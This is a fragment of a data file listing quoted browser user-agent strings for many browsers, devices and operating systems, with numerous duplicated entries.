'Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15',
'Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko',
'Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16',
'Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025',
'Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1',
'Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020',
'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1',
'Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330',
'Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8',
'Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0',
'Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9',
'Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0)',
'Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15',
'Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3',
'Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac OS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1',
'Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1',
'Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0',
'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3',
'Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)',
'Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5',
'Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20',
'Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2',
'Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ',
'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre',
'Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2',
'Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0',
'Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1',
'Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15',
'Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko',
'Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16',
'Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025',
'Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1',
'Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020',
'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1',
'Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330',
'Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8',
'Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0',
'Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9',
'Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0)',
'Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15',
'Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3',
'Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac OS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN',
"Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
